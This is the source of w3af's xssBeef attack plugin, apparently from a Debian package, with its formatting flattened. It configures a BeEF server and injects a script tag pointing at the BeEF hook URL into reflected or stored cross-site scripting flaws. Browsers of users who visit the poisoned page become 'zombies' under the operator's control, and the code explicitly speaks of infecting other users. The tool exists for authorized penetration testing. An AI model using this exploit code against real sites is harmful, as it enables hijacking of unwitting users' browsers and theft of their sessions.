/usr/share/w3af/plugins/attack/xssBeef.py is in w3af-console 1.0-rc3svn3489-1.
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Copyright 2006 Andres Riancho
This file is part of w3af, w3af.sourceforge.net .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
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import core.controllers.outputManager as om
from core.controllers.basePlugin.baseAttackPlugin import baseAttackPlugin
import core.data.parsers.urlParser as urlParser
from core.controllers.w3afException import w3afException
import core.data.kb.knowledgeBase as kb
from core.data.kb.shell import shell as shell
# options
from core.data.options.option import option
from core.data.options.optionList import optionList
class xssBeef(baseAttackPlugin):
Exploit XSS vulnerabilities using beEF ( www.bindshell.net/tools/beef/ ) .
@author: Andres Riancho ( andres.riancho@gmail.com )
def __init__(self):
# Internal variables
self._vuln = None
# User configured variables
self._beefPasswd = 'BeEFConfigPass'
# without the hook dir !
self._beefURL = 'http://localhost/beef/'
# A message to the user
self._message = 'You can start interacting with the beEF server at: '
self._message += urlParser.urlJoin( self._beefURL, 'ui/' )
def fastExploit(self, url, method, data ):
Exploits a web app with BeEF.
@parameter url: A string containing the Url to exploit ( http://somehost.com/foo.php )
@parameter method: A string containing the method to send the data ( post / get )
@parameter data: A string containing data to send with a mark that defines
which is the vulnerable parameter ( aa=notMe&bb=almost&cc=[VULNERABLE] )
return None
def getAttackType(self):
@return: The type of exploit, SHELL, PROXY, etc.
return 'proxy'
def getVulnName2Exploit( self ):
This method should return the vulnerability name (as saved in the kb) to exploit.
For example, if the audit.osCommanding plugin finds an vuln, and saves it as:
kb.kb.append( 'osCommanding' , 'osCommanding', vuln )
Then the exploit plugin that exploits osCommanding ( attack.osCommandingShell ) should
return 'osCommanding' in this method.
return 'xss'
def exploit( self, vulnToExploit=None ):
Exploits a XSS vuln that was found and stored in the kb.
@return: True if the shell is working and the user can start calling rexec
om.out.console( 'Browser Exploitation Framework - by Wade Alcorn http://www.bindshell.net' )
xss_vulns = kb.kb.getData( 'xss' , 'xss' )
if not self.canExploit():
raise w3afException('No cross site scripting vulnerabilities have been found.')
# First I'll configure the beef server, if this is unsuccessfull, then nothing else
# should be done!
# GET http://localhost/beef/submit_config.php?config=http://localhost/beef/&passwd=
#beEFconfigPass HTTP/1.1
config_URL = urlParser.urlJoin( self._beefURL , 'submit_config.php' )
config_URI = config_URL + '?config=' + self._beefURL + '&passwd=' + self._beefPasswd
response = self._urlOpener.GET( config_URI )
if response.getBody().count('BeEF Successfuly Configured'):
# everything ok!
elif 'Incorrect BeEF password, please try again.' in response.getBody():
raise w3afException('Incorrect password for beEF configuration.')
elif 'Permissions on the' in response.getBody():
raise w3afException('Incorrect BeEF installation')
raise w3afException('BeEF installation not found.')
# Try to get a proxy using one of the vulns
for vuln_obj in xss_vulns:
msg = 'Trying to exploit using vulnerability with id: ' + str( vuln_obj.getId() )
om.out.console( msg )
if self._generateProxy(vuln_obj):
# TODO: Create a proxy instead of a shell
# Create the shell object
shell_obj = xssShell(vuln_obj)
shell_obj.setBeefURL( self._beefURL )
kb.kb.append( self, 'shell', shell_obj )
return [ shell_obj, ]
msg = 'Failed to exploit using vulnerability with id: ' + str( vuln_obj.getId() )
om.out.console( msg )
return []
def _generateProxy( self, vuln_obj ):
@parameter vuln_obj: The vuln to exploit.
@return: True is a proxy could be established using the vuln parameter.
# Check if we really can contact the remote beef install
if self._verifyVuln( vuln_obj ):
self._vuln = vuln_obj
return True
return False
def _verifyVuln( self, vuln_obj ):
This command verifies a vuln. This is really hard work! :P
@parameter vuln_obj: The vulnerability to exploit.
@return : True if vuln can be exploited.
# Internal note:
# <script language="Javascript" src="http://localhost/beef/hook/beefmagic.js.php"></script>
to_include = '<script language="Javascript" src="'
to_include += urlParser.urlJoin( self._beefURL, 'hook/beefmagic.js.php' ) + '"></script>'
if 'permanent' in vuln_obj.keys():
# Its a permanent / persistant XSS, nice ! =)
write_payload_mutant = vuln_obj['write_payload']
write_payload_mutant.setModValue( to_include )
# Write the XSS
response = self._sendMutant( write_payload_mutant, analyze=False )
# Read it !
response = self._sendMutant( vuln_obj['read_payload'], analyze=False )
if to_include in response.getBody():
msg = 'The exploited cross site scripting is of type permanent. To be activated,'
msg += ' the zombies should navigate to: ' + vuln_obj['read_payload'].getURI()
om.out.console( msg )
om.out.console( self._message )
return True
return False
# Its a simple xss
if vuln_obj.getMethod() == 'GET':
# I'll be able to exploit this one.
mutant = vuln_obj.getMutant()
mutant.setModValue( to_include )
response = self._sendMutant( mutant, analyze=False )
if to_include in response.getBody():
msg = 'To be activated, the zombies have to navigate to: "'
msg += mutant.getURI() + '".'
om.out.console( msg )
om.out.console( self._message )
return True
return False
def rexec( self, command ):
Nothing to do here.
return self._message + ' \nType exit to continue using w3af.'
def getOptions( self ):
@return: A list of option objects for this plugin.
d1 = 'This is the location that the zombies will connect to (do not include the'
d1 += ' hook directory)'
h1 = 'This is configuration is directly passed to beEF XSS exploitation framework.'
o1 = option('beefURL', self._beefURL, d1, 'string', help=h1)
d2 = 'The configuration password for beef.'
h2 = 'This configuration parameter is needed to change the configuration of beEF.'
o2 = option('beefPasswd', self._beefPasswd, d2, 'string', help=h2)
ol = optionList()
return ol
def setOptions( self, optionsMap ):
This method sets all the options that are configured using the user interface
generated by the framework using the result of getOptions().
@parameter optionsMap: A map with the options for the plugin.
@return: No value is returned.
self._beefURL = optionsMap['beefURL'].getValue()
self._beefPasswd = optionsMap['beefPasswd'].getValue()
if self._beefPasswd == '':
om.out.error('You have to provide a beEF password to use this plugin.')
return False
def getPluginDeps( self ):
@return: A list with the names of the plugins that should be runned before the
current one.
return []
def getRootProbability( self ):
@return: This method returns the probability of getting a root shell using this attack plugin.
This is used by the "exploit *" function to order the plugins and first try to exploit the more critical ones.
This method should return 0 for an exploit that will never return a root shell, and 1 for an exploit that WILL ALWAYS
return a root shell.
return 0.0
def getLongDesc( self ):
@return: A DETAILED description of the plugin functions and features.
return '''
This plugin is an interface to aid with the exploitation of XSS vulnerabilities using beEF.
Two configurable parameters exist:
- beefURL
- beefPasswd
Please note that this plugin is only a "caller" to beef and:
- You have to install beef
- After running this plugin you have to infect other users with the URL provided by w3af
- You have to open a browser and point it to your beef installation in order to manage zombies
class xssShell(shell):
def _rexec( self, command ):
msg = 'TODO: Code some commands here. For now, just execute endInteraction'
msg += ' (this won\'t close BeEF)'
return msg
def setBeefURL(self, beef_url):
self._beefURL = beef_url
def end( self ):
om.out.debug('xssShell cleanup complete.')
def getName( self ):
return 'xss_shell'
def _identifyOs(self):
return 'xss'
def __repr__( self ):
return '<'+self.getName()+' object (Browse to: "'+self._beefURL+'")>'
def getRemoteSystem( self ):
@return: dz0@sock3t:~/w3af$ uname -o -r -n -m -s
Linux sock3t 2.6.15-27-686 i686 GNU/Linux
Or in this case... the user is using a browser!
return 'browser'
def getRemoteUser( self ):
return 'user'
def getRemoteSystemName( self ):
@return: dz0@sock3t:~/w3af$ uname -n
return 'browser'
__str__ = __repr__